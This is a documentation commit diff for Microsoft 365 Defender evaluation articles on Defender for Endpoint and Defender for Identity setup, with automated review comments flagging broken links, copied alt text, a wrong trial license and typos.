- > For new Microsoft Defender for Identity instances, this integration toggle is automatically turned on. Confirm that your Microsoft Defender for Identity integration has been enabled before you proceed to the next step.
-
-4. Under the Cloud discovery settings, select **Microsoft Defender for Endpoint integration**, then enable the integration. Click **Save**.
-
- ![Image of_the Microsoft Defender for Endpoint page where the block unsanctioned apps checkbox under Microsoft Defender for Endpoint integration is selected. Click save.](../../media/mtp-eval-56.png)
-
-5. Under Cloud discovery settings, select **User enrichment**, then enable the integration with Azure Active Directory.
-
- ![Image of User enrichment section where the enrich discovered user identifiers with Azure Active Directory usernames checkbox is selected](../../media/mtp-eval-57.png)
-
-## Configure Microsoft Defender for Endpoint
-
-> [!NOTE]
-> Skip this step if you've already enabled Microsoft Defender for Endpoint.
-
-1. Navigate to [Microsoft 365 Security Center](https://security.microsoft.com/info) > **More Resources** > **Microsoft Defender Security Center**. Click **Open**.
-
- ![Image of_Microsoft Defender Security Center option in the Microsoft 365 Security Center page](../../media/mtp-eval-58.png)
-
-2. Follow the Microsoft Defender for Endpoint wizard. Click **Next**.
-
- ![Image of_the Microsoft Defender Security Center welcome wizard page](../../media/mtp-eval-59.png)
-
-3. Choose based on your preferred data storage location, data retention policy, organization size, and opt-in for preview features.
-
- ![Image of_the page to select your data storage country, retention policy, and organization size. Click next when you're done selecting.](../../media/mtp-eval-60.png)
-
- > [!NOTE]
- > You cannot change some of the settings, like data storage location, afterwards.
-
- Click **Next**.
-
-4. Click **Continue** and it will provision your Microsoft Defender for Endpoint tenant.
-
- ![Image of_the page prompting you click the continue button to create your cloud instance](../../media/mtp-eval-61.png)
-
-5. Onboard your endpoints through Group Policies, Microsoft Endpoint Manager or by running a local script to Microsoft Defender for Endpoint. For simplicity, this guide uses the local script.
-
-6. Click **Download package** and copy the onboarding script to your endpoint(s).
-
- ![Image of_page prompting you click the Download package button to copy the onboarding script to your endpoint or endpoints](../../media/mtp-eval-62.png)
-
-7. On your endpoint, run the onboarding script as Administrator and choose Y.
-
- ![Image of_the commandline where you run the onboarding script and choose Y to proceed](../../media/mtp-eval-63.png)
-
-8. Congratulations, you've onboarded your first endpoint.
-
- ![Image of_the commandline where you get the confirmation that you've onboarded your first endpoint. Press any key to continue](../../media/mtp-eval-64.png)
-
-9. Copy-paste the detection test from the Microsoft Defender for Endpoint wizard.
-
- ![Image of_the run a detection test step where you should click Copy to copy the detection test script that you should paste in the command prompt](../../media/mtp-eval-65.png)
-
-10. Copy the PowerShell script to an elevated command prompt and run it.
-
- ![Image of_command prompt where you should copy the PowerShell script to an elevated command prompt and run it](../../media/mtp-eval-66.png)
-
-11. Select **Start using Microsoft Defender for Endpoint** from the Wizard.
-
- ![Image of_the confirmation prompt from the wizard where you should click Start using Microsoft Defender for Endpoint](../../media/mtp-eval-67.png)
-
-12. Visit the [Microsoft Defender Security Center](https://securitycenter.windows.com/). Go to **Settings** and then select **Advanced features**.
-
- ![Image of_Microsoft Defender Security Center Settings menu where you should select Advanced features](../../media/mtp-eval-68.png)
-
-13. Turn on the integration with **Microsoft Defender for Identity**.
-
- ![Image of_Microsoft Defender Security Center Advanced features, Microsoft Defender for Identity option toggle that you need to turn on](../../media/mtp-eval-69.png)
-
-14. Turn on the integration with **Office 365 Threat Intelligence**.
-
- ![Image of_Microsoft Defender Security Center Advanced features, Office 365 Threat Intelligence option toggle that you need to turn on](../../media/mtp-eval-70.png)
-
-15. Turn on integration with **Microsoft Cloud App Security**.
-
- ![Image of_Microsoft Defender Security Center Advanced features, Microsoft Cloud App Security option toggle that you need to turn on](../../media/mtp-eval-71.png)
-
-16. Scroll down and click **Save preferences** to confirm the new integrations.
-
- ![Image of_Save preferences button that you need to click](../../media/mtp-eval-72.png)
-
-## Start the Microsoft 365 Defender service
-
-> [!NOTE]
-> Starting June 1, 2020, Microsoft automatically enables Microsoft 365 Defender features for all eligible tenants. See this [Microsoft Tech Community article on license eligibility](https://techcommunity.microsoft.com/t5/security-privacy-and-compliance/microsoft-threat-protection-will-automatically-turn-on-for/ba-p/1345426) for details.
-
-Go to [Microsoft 365 Security Center](https://security.microsoft.com/homepage). Navigate to **Settings** and then select **Microsoft 365 Defender**.
-
-![Image of_Microsoft 365 Defender option screenshot from the Microsoft 365 Security Center Settings page](../../media/mtp-eval-72b.png)
-
-For a more comprehensive guidance, see [Turn on Microsoft 365 Defender](m365d-enable.md).
-
-Congratulations! You've just created your Microsoft 365 Defender trial lab or pilot environment! Now you can familiarize yourself with the Microsoft 365 Defender user interface! See what you can learn from the following Microsoft 365 Defender interactive guide and know how to use each dashboard for your day-to-day security operation tasks.
-
-[Check out the interactive guide](https://aka.ms/MTP-Interactive-Guide)
-
-Next, you can simulate an attack and see how the cross product capabilities detect, create alerts, and automatically respond to a fileless attack on an endpoint.
-
-## Next step
--- [Generate a test alert](generate-test-alert.md) - Run an attack simulation in your Microsoft 365 Defender trial lab.
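Review bot: deleting config-m365d-eval.md removes the only walkthrough of the cross-product integration switches (Explorer > **Microsoft Defender for Endpoint Settings** > **Connect to Microsoft Defender for Endpoint** in Defender for Office 365, the **Microsoft Defender for Endpoint** toggle in Defender for Identity settings, the **Microsoft Defender for Identity integration** and **Microsoft Defender for Endpoint integration** settings in Cloud App Security, and the **Advanced features** toggles in the Defender Security Center), and the eval-defender-endpoint-* articles added in this same commit do not cover any of them. Either keep that content or confirm it lands in the new per-product enable articles, and add a redirect for the deleted URL so existing links (this page is in the `m365solution-evalutatemtp` collection) do not 404. If the Defender for Identity steps are moved rather than dropped, step 4's `This can be any user account that has read access to Active Directory` should be changed to recommend a dedicated, least-privilege account for the sensor rather than an arbitrary domain user.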
security Eval Create Eval Environment https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/eval-create-eval-environment.md
+
+ Title: Create the Microsoft 365 Defender Evaluation Environment. Activate or enable trial licenses, and continue on to Microsoft Defender for Identity (MDI).
+description: Set up your Microsoft 365 Defender trial lab or pilot environment by activating trial licenses. Then set up Microsoft Defender for Identity (MDI) and all other M365D evaluations.
+search.product: eADQiWindows 10XVcnh
+search.appverid: met150
+ms.mktglfcycl: deploy
+ms.sitesec: library
+ms.pagetype: security
+f1.keywords:
+ - NOCSH
++ Last updated : 05/19/2021
+localization_priority: Normal
+
+audience: ITPro
+
+ - M365-security-compliance
+ - m365solution-overview
+ - m365solution-evalutatemtp
+
+ms.technology: m365d
+
+# Create the Microsoft 365 Defender Evaluation Environment
+
+There are two common ways to do this next step in evaluation. This document assumes you already have a production M365 tenant, and will activate E5 trial licenses to evaluate M365 Defender in *the current environment*. An in-place evaluation will let you keep any security methods with the purchase of licenses after the evaluation period.
+
+The second is to [Set up your Microsoft 365 Defender trial lab environment](setup-m365deval.md) for the purpose of evaluation. It may not have many real signals from the business, so be aware of that caveat.
+
+## To activate E5 trial licenses to evaluate Microsoft 365 Defender
+1. Log on to your existing M365 tenant administration portal.
+2. Select *Purchase Services* from the navigation menu.
+3. Scroll down to the *Office 365* section and select "Details" button under Office 365 E5 license.
++
+4. Select *Start free trial* link.
++
+5. Confirm your request and click *Try now* button.
++
+## Next steps
+[Enable Microsoft 365 for Identity](eval-defender-identity-overview.md)
+
+Return to the overview for [Evaluate and pilot Microsoft 365 Defender](eval-overview.md)
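Review bot: the trial activated in steps 3 to 5 is the wrong SKU for what the article promises. The title and the Next steps section send readers on to Microsoft Defender for Identity and "all other M365D evaluations", but step 3 selects the trial under `Office 365 E5`, which licenses Defender for Office 365 but not Defender for Identity or Defender for Endpoint; the Microsoft 365 E5 trial is the one that covers all four products, so the section heading and step 3 should name it. Also: the Next steps link text `[Enable Microsoft 365 for Identity](eval-defender-identity-overview.md)` should read "Microsoft Defender for Identity"; the sentence "An in-place evaluation will let you keep any security methods with the purchase of licenses after the evaluation period" needs rewording to say that the configuration carries over if licenses are purchased; and the bare `++` lines after steps 3, 4 and 5 look like dropped screenshot references.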
security Eval Defender Endpoint Architecture https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/eval-defender-endpoint-architecture.md
+
+ Title: Review Microsoft Defender for Endpoint architecture requirements and key concepts
+description: The technical diagram for Microsoft Defender for Endpoint in Microsoft 365 Defender will help you understand identity in Microsoft 365 before you build your trial lab or pilot environment.
+search.product: eADQiWindows 10XVcnh
+search.appverid: met150
+ms.mktglfcycl: deploy
+ms.sitesec: library
+ms.pagetype: security
+f1.keywords:
+ - NOCSH
++ Last updated : 07/09/2021
+localization_priority: Normal
+
+audience: ITPro
+
+ - M365-security-compliance
+ - m365solution-overview
+ - m365solution-evalutatemtp
+
+ms.technology: m365d
++
+# Review Microsoft Defender for Endpoint architecture requirements and key concepts
+
+**Applies to:**
+Microsoft 365 Defender
+
+This article will guide you in the process of setting up the evaluation for Microsoft Defender for Endpoint environment.
+
+For more information about this process, see the [overview article](eval-defender-endpoint-overview.md).
+
+Before enabling Microsoft Defender for Endpoint, be sure you understand the architecture and can meet the requirements.
+
+## Understand the architecture
+
+The following diagram illustrates Microsoft Defender for Endpoint architecture and integrations.
+
+![Steps for adding Microsoft Defender for Office to the Defender evaluation environment](../../media/defender/m365-defender-endpoint-architecture.png)
+
+The following table describes the illustration.
+
+Call-out | Description
+:|:|
+1 | Devices are on-boarded through one of the supported management tools.
+2 | On-boarded devices provide and respond to Microsoft Defender for Endpoint signal data.
+3 | Managed devices are joined and/or enrolled in Azure Active Directory.
+4 | Domain-joined Windows 10 devices are synchronized to Azure Active Directory using Azure Active Directory Connect.
+5 | Microsoft Defender for Endpoint alerts, investigations, and responses are managed in Microsoft 365 Defender.
+
+## Understand key concepts
+
+The following table identified key concepts that are important to understand when evaluating, configuring, and deploying Microsoft Defender for Endpoint:
+
+Concept | Description | More information
+:|:|:|
+Administration Portal | Microsoft 365 Defender portal to monitor and assist in responding to alerts of potential advanced persistent threat activity or data breaches. | [Microsoft Defender for Endpoint portal overview](/defender-endpoint/portal-overview)
+Attack Surface Reduction | Help reduce your attack surfaces by minimizing the places where your organization is vulnerable to cyberthreats and attacks. | [Overview of attack surface reduction](/defender-endpoint/overview-attack-surface-reduction)
+Endpoint Detection and Response | Endpoint detection and response capabilities provide advanced attack detections that are near real-time and actionable. | [Overview of endpoint detection and response capabilities](/defender-endpoint/overview-endpoint-detection-response)
+Behavioral Blocking and Containment | Behavioral blocking and containment capabilities can help identify and stop threats, based on their behaviors and process trees even when the threat has started execution. | [Behavioral blocking and containment](/defender-endpoint/behavioral-blocking-containment)
+Automated Investigation and Response | Automated investigation uses various inspection algorithms based on processes that are used by security analysts and designed to examine alerts and take immediate action to resolve breaches. | [Use automated investigations to investigate and remediate threats](/defender-endpoint/automated-investigations)
+Advanced Hunting | Advanced hunting is a query-based threat-hunting tool that lets you explore up to 30 days of raw data so that you can proactively inspect events in your network to locate threat indicators and entities. | [Overview of advanced hunting](/defender-endpoint/advanced-hunting-overview)
+Threat Analytics | Threat analytics is a set of reports from expert Microsoft security researchers covering the most relevant threats. | [Track and respond to emerging threats](/defender-endpoint/threat-analytics)
++
+For more detailed information about the capabilities included with Microsoft Defender for Endpoint, see [What is Microsoft Defender for Endpoint](/defender-endpoint/microsoft-defender-endpoint).
+
+## SIEM integration
+
+You can integrate Microsoft Defender for Endpoint with Azure Sentinel to more comprehensively analyze security events across your organization and build playbooks for effective and immediate response.
+
+Microsoft Defender for Endpoint can also be integrated into other Security Information and Event Management (SIEM) solutions. For more information, see [Enable SIEM integration in Microsoft Defender for Endpoint](/defender-endpoint/enable-siem-integration).
++
+## Next steps
+[Enable the evaluation](eval-defender-endpoint-enable-eval.md)
+
+Return to the overview for [Evaluate Microsoft Defender for Endpoint](eval-defender-endpoint-overview.md)
+
+Return to the overview for [Evaluate and pilot Microsoft 365 Defender](eval-overview.md)
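Review bot: the front-matter description and the diagram alt text were copied from other pillars' articles. The description says the diagram "will help you understand identity in Microsoft 365" and the alt text reads "Steps for adding Microsoft Defender for Office to the Defender evaluation environment", while the image is the Defender for Endpoint architecture diagram. The "More information" links use root-relative paths such as `/defender-endpoint/portal-overview`, whereas the sibling article added in the same commit links as `../defender-endpoint/deployment-strategy.md`; pick one form and confirm the root-relative ones resolve, since `/defender-endpoint/...` drops the `microsoft-365/security` segment. Minor: "The following table identified key concepts" should be "identifies".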
security Eval Defender Endpoint Enable Eval https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/eval-defender-endpoint-enable-eval.md
+
+ Title: Enable Microsoft Defender for Endpoint evaluation, activate the evaluation for MDE
+description: Enable your Microsoft 365 Defender trial lab or pilot environment, including checking license state, and onboarding enpoints
+search.product: eADQiWindows 10XVcnh
+search.appverid: met150
+ms.mktglfcycl: deploy
+ms.sitesec: library
+ms.pagetype: security
+f1.keywords:
+ - NOCSH
++ Last updated : 07/09/2021
+localization_priority: Normal
+
+audience: ITPro
+
+ - M365-security-compliance
+ - m365solution-overview
+ - m365solution-evalutatemtp
+
+ms.technology: m365d
++
+# Enable Microsoft Defender for Endpoint evaluation environment
++
+This article will guide you through the steps on setting up the evaluation environment for Microsoft Defender for Endpoint using production devices.
++
+>[!TIP]
+>Microsoft Defender for Endpoint also comes with an in-product evaluation lab where you can add pre-configured devices and run simulations to evaluate the capabilities of the platform. The lab comes with a simplified set-up experience that can help quickly demonstrate the value of Microsoft Defender for Enpdoint including guidance for many features like advanced hunting and threat analytics. For more information, see [Evaluate capabilities](/defender-endpoint/evaluation-lab.md). <br> The main difference between the guidance provided in this article and the evaluation lab is the evaluation environment uses production devices whereas the evaluation lab uses non-production devices.
+
+Use the following steps to enable the evaluation for Microsoft Defender for Endpoint.
+
+![Steps to enable Microsoft Defender for Endpoint in the Microsoft Defender evaluation environment](../../media/defender/m365-defender-endpoint-eval-enable-steps.png)
+
+- [Step 1. Check license state](#step-1-check-license-state)
+- [Step 2. Onboard endpoints](#step-2-onboard-endpoints-using-any-of-the-supported-management-tools)
++
+## Step 1. Check license state
+
+You'll first need to check the license state to verify that it was properly provisioned. You can do this through the admin center or through the **Microsoft Azure portal**.
++
+1. To view your licenses, go to the **Microsoft Azure portal** and navigate to the [Microsoft Azure portal license section](https://portal.azure.com/#blade/Microsoft_AAD_IAM/LicensesMenuBlade/Products).
+
+ ![Image of Azure Licensing page](../../media/defender/atp-licensing-azure-portal.png)
+
+1. Alternately, in the admin center, navigate to **Billing** > **Subscriptions**.
+
+ On the screen, you'll see all the provisioned licenses and their current **Status**.
+
+ ![Image of billing licenses](../../media/defender/atp-billing-subscriptions.png)
+
+## Step 2. Onboard endpoints using any of the supported management tools
+
+After verifying that the license state has been provisioned properly, you can start onboarding devices to the service.
+
+For the purpose of evaluating Microsoft Defender for Endpoint, we recommend choosing a couple of Windows 10 devices to conduct the evaluation on.
+
+The [Plan deployment](../defender-endpoint/deployment-strategy.md) topic outlines the general steps you need to take to deploy Defender for Endpoint.
+
+Watch this video for a quick overview of the onboarding process and learn about the available tools and methods.
+
+> [!VIDEO https://www.microsoft.com/videoplayer/embed/RE4bGqr]
+
+### Onboarding tool options
+
+The following table lists the available tools based on the endpoint that you need to onboard.
+
+Endpoint | Tool options
+:|:
+**Windows** | [Local script (up to 10 devices)](../defender-endpoint/configure-endpoints-script.md), [Group Policy](../defender-endpoint/configure-endpoints-gp.md), [Microsoft Endpoint Manager/ Mobile Device Manager](../defender-endpoint/configure-endpoints-mdm.md), [Microsoft Endpoint Configuration Manager](../defender-endpoint/configure-endpoints-sccm.md), [VDI scripts](../defender-endpoint/configure-endpoints-vdi.md), [Integration with Azure Defender](../defender-endpoint/configure-server-endpoints.md#integration-with-azure-defender)
+**macOS** | [Local scripts](../defender-endpoint/mac-install-manually.md), [Microsoft Endpoint Manager](../defender-endpoint/mac-install-with-intune.md), [JAMF Pro](../defender-endpoint/mac-install-with-jamf.md), [Mobile Device Management](../defender-endpoint/mac-install-with-other-mdm.md)
+**Linux Server** | [Local script](../defender-endpoint/linux-install-manually.md), [Puppet](../defender-endpoint/linux-install-with-puppet.md), [Ansible](../defender-endpoint/linux-install-with-ansible.md)
+**iOS** | [App-based](../defender-endpoint/ios-install.md)
+**Android** | [Microsoft Endpoint Manager](../defender-endpoint/android-intune.md)
+++
+## Next step
+[Setup the pilot for Microsoft Defender for Endpoint](eval-defender-endpoint-pilot.md)
+
+Return to the overview for [Evaluate Microsoft Defender for Endpoint](eval-defender-endpoint-overview.md)
+
+Return to the overview for [Evaluate and pilot Microsoft 365 Defender](eval-overview.md)
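Review bot: the TIP's link `[Evaluate capabilities](/defender-endpoint/evaluation-lab.md)` mixes a root-relative path with a `.md` extension and does not match the `../defender-endpoint/...md` form used in the onboarding table below; it should be `../defender-endpoint/evaluation-lab.md`. Typos: "enpoints" in the description, "Enpdoint" and "set-up" in the TIP. The `+++` before "## Next step" looks like leftover blank lines. In Step 1, the article says to "verify that it was properly provisioned" but never says what to look for; state the expected **Status** value on the Billing > Subscriptions page so readers know when it is safe to proceed to onboarding.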
security Eval Defender Endpoint Overview https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/eval-defender-endpoint-overview.md
+
+ Title: Evaluate Microsoft Defender for Endpoint overview, including reviewing the architecture, enabling or activating the evaluation environment, and building a pilot.
+description: Steps for the set up for a Microsoft 365 Defender trial lab or pilot environment. Test and experience how the security solution is designed to protect devices, identity, data, and apps in your organization.
+search.product: eADQiWindows 10XVcnh
+search.appverid: met150
+ms.mktglfcycl: deploy
+ms.sitesec: library
+ms.pagetype: security
+f1.keywords:
+ - NOCSH
++ Last updated : 07/09/2021
+localization_priority: Normal
+
+audience: ITPro
+
+ - M365-security-compliance
+ - m365solution-overview
+ - m365solution-evalutatemtp
+
+ms.technology: m365d
++
+# Evaluate Microsoft Defender for Endpoint overview
+
+**Applies to:**
+
+- Microsoft 365 Defender
++
+This article outlines the process to enable and pilot Microsoft Defender for Endpoint. Before starting this process, be sure you've reviewed the overall process for [evaluating Microsoft 365 Defender](eval-overview.md) and you have [created the Microsoft 365 Defender evaluation environment](eval-create-eval-environment.md).
+<br>
+
+Use the following steps to enable and pilot Microsoft Defender for Endpoint.
+
+![Steps for adding Microsoft Defender for Endpoint to the Defender evaluation environment](../../media/defender/m365-defender-endpoint-eval-steps.png)
++
+The following table describes the steps in the illustration.
+
+ |Step |Description
+|||
+| [Step 1. Review architecture requirements and key concepts](eval-defender-endpoint-architecture.md) | Understand the Defender for Endpoint architecture and the capabilities available to you. |
+|[Step 2. Enable the evaluation environment](eval-defender-office-365-enable-eval.md) | Follow the steps to setup the evaluation environment. |
+|[Step 3. Set up the pilot ](eval-defender-office-365-pilot.md) | Verify your pilot group, run simulations, and become familiar with key features and dashboards. |
++
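Review bot: Steps 2 and 3 in the table link to the wrong product's articles. `[Step 2. Enable the evaluation environment](eval-defender-office-365-enable-eval.md)` and `[Step 3. Set up the pilot ](eval-defender-office-365-pilot.md)` point at the Defender for Office 365 pages, but this commit adds `eval-defender-endpoint-enable-eval.md` and `eval-defender-endpoint-pilot.md`, which are the intended targets. The table also lacks a separator row (`|||` should be `|---|---|`), so it will not render as a table, and the leading space before `|Step |Description` should go.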
security Eval Defender Endpoint Pilot https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/eval-defender-endpoint-pilot.md
+
+ Title: Pilot Microsoft Defender for Endpoint, set up a pilot, test capabilities in evaluation
+description: Learn how to run a pilot for Microsoft Defender for Endpoint(MDE), including verifying the pilot group and trying out capabilities.
+search.product: eADQiWindows 10XVcnh
+search.appverid: met150
+ms.mktglfcycl: deploy
+ms.sitesec: library
+ms.pagetype: security
+f1.keywords:
+ - NOCSH
++ Last updated : 07/09/2021
+localization_priority: Normal
+
+audience: ITPro
+
+ - M365-security-compliance
+ - m365solution-overview
+ - m365solution-evalutatemtp
+
+ms.technology: m365d
++
+# Pilot Microsoft Defender for Endpoint
+
+This article will guide you in the process of running a pilot for Microsoft Defender for Endpoint.
+
+Use the following steps to setup and configure the pilot for Microsoft Defender for Endpoint.
+
+![Steps for adding Microsoft Defender for Identity to the Defender evaluation environment](../../media/defender/m365-defender-endpoint-pilot-steps.png)
+
+- Step 1. Verify pilot group
+- Step 2. Try out capabilities
+
+When you pilot Microsoft Defender for Endpoint, you may choose to onboard a few devices to the service before onboarding your entire organization.
+
+You can then try out capabilities that are available such as running attack simulations and seeing how Defender for Endpoint surfaces malicious activities and enables you to conduct an efficient response.
+
+## Step 1. Verify pilot group
+After completing the onboarding steps outlined in the [Enable evaluation](eval-defender-endpoint-enable-eval.md) section, you should see the devices in the Device inventory list approximately after an hour.
+
+When you see your onboarded devices you can then proceed with trying out capabilities.
+
+## Step 2. Try out capabilities
+Now that you've completed onboarding some devices and verified that they are reporting to the service, familiarize yourself with the product by trying out the powerful capabilities that are available right out of the box.
+
+During the pilot, you can easily get started with trying out some of the features to see the product in action without going through complex configuration steps.
+
+Let's start by checking out the dashboards.
+
+### View the device inventory
+The device inventory is where you'll see the list of endpoints, network devices, and IoT devices in your network. Not only does it provide you with a view of the devices in your network, but it also gives your in-depth information about them such as domain, risk level, OS platform, and other details for easy identification of devices most at risk.
+
+### View the Threat and vulnerability management dashboard
+Threat and vulnerability management helps you focus on the weaknesses that pose the most urgent and the highest risk to the organization. From the dashboard, get a high-level view of the organization exposure score, Microsoft Secure Score for Devices, device exposure distribution, top security recommendations, top vulnerable software, top remediation activities, and top exposed device data.
+
+### Run a simulation
+Microsoft Defender for Endpoint comes with ["Do It Yourself" attack scenarios](https://securitycenter.windows.com/tutorials) that you can run on your pilot devices. Each document includes OS and application requirements as well as detailed instructions that are specific to an attack scenario. These scripts are safe, documented, and easy to use. These scenarios will reflect Defender for Endpoint capabilities and walk you through investigation experience.
+
+To run any of the provided simulations, you need at least [one onboarded device](../defender-endpoint/onboard-configure.md).
+
+1. In **Help** > **Simulations & tutorials**, select which of the available attack scenarios you would like to simulate:
+
+ - **Scenario 1: Document drops backdoor** - simulates delivery of a socially engineered lure document. The document launches a specially crafted backdoor that gives attackers control.
+
+ - **Scenario 2: PowerShell script in fileless attack** - simulates a fileless attack that relies on PowerShell, showcasing attack surface reduction and device learning detection of malicious memory activity.
+
+ - **Scenario 3: Automated incident response** - triggers automated investigation, which automatically hunts for and remediates breach artifacts to scale your incident response capacity.
+
+2. Download and read the corresponding walkthrough document provided with your selected scenario.
+
+3. Download the simulation file or copy the simulation script by navigating to **Help** > **Simulations & tutorials**. You can choose to download the file or script on the test device but it's not mandatory.
+
+4. Run the simulation file or script on the test device as instructed in the walkthrough document.
+
+> [!NOTE]
+> Simulation files or scripts mimic attack activity but are actually benign and will not harm or compromise the test device.
+
+## Next steps
+[Evaluate Microsoft Cloud App Security](eval-defender-mcas-overview.md)
+
+Return to the overview for [Evaluate Microsoft Defender for Endpoint](eval-defender-endpoint-overview.md)
+
+Return to the overview for [Evaluate and pilot Microsoft 365 Defender](eval-overview.md)
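Review bot: the image alt text under "Use the following steps to setup and configure the pilot" reads "Steps for adding Microsoft Defender for Identity to the Defender evaluation environment", but the image is `m365-defender-endpoint-pilot-steps.png` in an Endpoint article; the alt text looks copied from the Identity article and should name Defender for Endpoint. This article also lacks the `**Applies to:**` / `- Microsoft 365 Defender` block that every other article in this change carries. Wording: "setup and configure" should be "set up and configure", "it also gives your in-depth information" should be "gives you", and "approximately after an hour" reads better as "after approximately an hour". The simulation link uses the legacy host `https://securitycenter.windows.com/tutorials`, while the rest of this change sends readers to security.microsoft.com; consider pointing at the Simulations & tutorials page of the Microsoft 365 Defender portal instead.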
security Eval Defender Identity Architecture https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/eval-defender-identity-architecture.md
+
+ Title: Review architecture requirements and the technical framework for Microsoft Defender for Identity, architecture diagram, MDI
+description: The technical diagram for Microsoft Defender for Identity in Microsoft 365 Defender will help you understand identity in Microsoft 365 before you build your trial lab or pilot environment.
+search.product: eADQiWindows 10XVcnh
+search.appverid: met150
+ms.mktglfcycl: deploy
+ms.sitesec: library
+ms.pagetype: security
+f1.keywords:
+ - NOCSH
++ Last updated : 07/09/2021
+localization_priority: Normal
+
+audience: ITPro
+
+ - M365-security-compliance
+ - m365solution-overview
+ - m365solution-evalutatemtp
+
+ms.technology: m365d
++
+# Review architecture requirements and key concepts for Microsoft Defender for Identity
++
+**Applies to:**
+- Microsoft 365 Defender
+
+This article is [Step 1 of 3](eval-defender-identity-overview.md) in the process of setting up the evaluation environment for Microsoft Defender for Identity. For more information about this process, see the [overview article](eval-defender-identity-overview.md).
+
+Before enabling Microsoft Defender for Identity, be sure you understand the architecture and can meet the requirements.
+
+Microsoft Defender for Identity uses machine learning and behavioral analytics to identify attacks across your on-premises network along with detecting and proactively preventing user sign-in risks associated with cloud identities. For more information, see [What is Microsoft Defender for Identity?](/defender-for-identity/what-is)
+
+Defender for Identity protects your on-premises Active Directory users and/or users synced to your Azure Active Directory (Azure AD). To protect an environment made up of only Azure AD users, see [Azure AD Identity Protection](/azure/active-directory/identity-protection/overview-identity-protection).
+
+## Understand the architecture
+
+The following diagram illustrates the baseline architecture for Defender for Identity.
+
+![Architecture for Microsoft Defender for Identity](../../media/defender/m365-defender-identity-architecture.png)
+
+In this illustration:
+- Sensors installed on AD domain controllers parse logs and network traffic and send them to Microsoft Defender for Identity for analysis and reporting.
+- Sensors can also parse Active Directory Federation Services (AD FS) when Azure AD is configured to use federated authentication (dotted line in illustration).
+- Microsoft Defender for Identity shares signals to Microsoft 365 Defender for extended detection and response (XDR).
++
+Defender for Identity sensors can be directly installed on the following servers:
+
+- Domain controllers: The sensor directly monitors domain controller traffic, without the need for a dedicated server, or configuration of port mirroring.
+- AD FS: The sensor directly monitors network traffic and authentication events.
+
+For a deeper look into the architecture of Defender for Identity, including integration with Cloud App Security, see [Microsoft Defender for Identity architecture](/defender-for-identity/architecture).
++
+## Understand key concepts
+
+The following table identified key concepts that are important to understand when evaluating, configuring, and deploying Microsoft Defender for Identity.
++
+|Concept |Description |More information |
+||||
+| Monitored activities | Defender for Identity monitors signals generated from within your organization to detect suspicious or malicious activity and helps you determine the validity of each potential threat so that you can effectively triage and respond. | [Microsoft Defender for Identity monitored activities](/defender-for-identity/monitored-activities) |
+| Security alerts | Defender for Identity security alerts explain the suspicious activities detected by sensors on your network along with the actors and computers involved in each threat. | [Microsoft Defender for Identity Security Alerts](/defender-for-identity/suspicious-activity-guide?tabs=external) |
+| Entity profiles | Entity profiles provide a comprehensive deep-dive investigation of users, computers, devices, and resources along with their access history. | [Understanding entity profiles](/defender-for-identity/entity-profiles) |
+| Lateral movement paths | A key component of MDI security insights is identifying lateral movement paths in which an attacker uses non-sensitive accounts to gain access to sensitive accounts or machines throughout your network. | [Microsoft Defender for Identity Lateral Movement Paths (LMPs)](/defender-for-identity/use-case-lateral-movement-path) |
+| Network Name Resolution | Network Name Resolution (NNR) is a component of MDI functionality which captures activities based on network traffic, Windows events, ETW, etc. and correlates this raw data to the relevant computers involved in each activity. | [What is Network Name Resolution?](/defender-for-identity/nnr-policy) |
+| Reports | Defender for Identity reports allow you to schedule or immediately generate and download reports that provide system and entity status information. You can create reports about system health, security alerts, and potential lateral movement paths detected in your environment. | [Microsoft Defender for Identity Reports ](/defender-for-identity/reports) |
+| Role groups | Defender for Identity offers role-based groups and delegated access to safeguard data according to your organization's specific security and compliance needs which includes Administrators, Users and Viewers. | [Microsoft Defender for Identity role groups](/defender-for-identity/role-groups) |
+| Administrative portal | In addition to the Microsoft 365 Security Center, the Defender for Identity portal cab be used to monitor and respond to suspicious activity. | [Working with the Microsoft Defender for Identity portal](/defender-for-identity/workspace-portal) |
+| Microsoft Cloud App Security integration | Microsoft Cloud App Security integrates with Microsoft Defender for Identity to provide user entity behavioral analytics (UEBA) across a hybrid environment - both cloud app and on-premises | Microsoft Defender for Identity integration |
+| | | |
++
+## Review prerequisites
+
+Defender for Identity requires some prerequisite work to ensure that your on-premises identity and networking components meet minimum requirements. Use this article as a checklist to ensure your environment is ready: [Microsoft Defender for Identity prerequisites](/defender-for-identity/prerequisites).
++
+## Next steps
+
+Step 2 of 3: [Enable the evaluation environment Defender for Identity](eval-defender-identity-enable-eval.md)
+
+Return to the overview for [Evaluate Microsoft Defender for Identity](eval-defender-identity-overview.md)
+
+Return to the overview for [Evaluate and pilot Microsoft 365 Defender](eval-overview.md)
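Review bot: the key concepts table has one row that breaks its own pattern: the "Microsoft Cloud App Security integration" entry carries plain text "Microsoft Defender for Identity integration" in the More information column where every other row has a link, and its description has no closing period; add the link or drop the value. The trailing `| | | |` row renders as a blank table row and should be removed. Typos: "The following table identified key concepts" should be "identifies", and "the Defender for Identity portal cab be used" should be "can be used". "MDI" appears in the Lateral movement paths and Network Name Resolution rows without being expanded anywhere in the body; spell out Microsoft Defender for Identity or introduce the abbreviation at first use. In the architecture bullets, "Sensors can also parse Active Directory Federation Services (AD FS)" should say what is parsed (AD FS network traffic and authentication events, as the later bullet states).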
security Eval Defender Identity Enable Eval https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/eval-defender-identity-enable-eval.md
+
+ Title: Enable the evaluation environment for Microsoft Defender for Identity, set up the MDI instance, install and configure MDI sensor, let MDI sensor detect local admins
+description: Set up Microsoft Defender for Identity in Microsoft 365 Defender trial lab or pilot environment by installing & configuring the sensor, and discovering local admins on other computers.
+search.product: eADQiWindows 10XVcnh
+search.appverid: met150
+ms.mktglfcycl: deploy
+ms.sitesec: library
+ms.pagetype: security
+f1.keywords:
+ - NOCSH
++ Last updated : 07/09/2021
+localization_priority: Normal
+
+audience: ITPro
+
+ - M365-security-compliance
+ - m365solution-overview
+ - m365solution-evalutatemtp
+
+ms.technology: m365d
++
+# Enable the evaluation environment for Microsoft Defender for Identity
+
+**Applies to:**
+- Microsoft 365 Defender
+
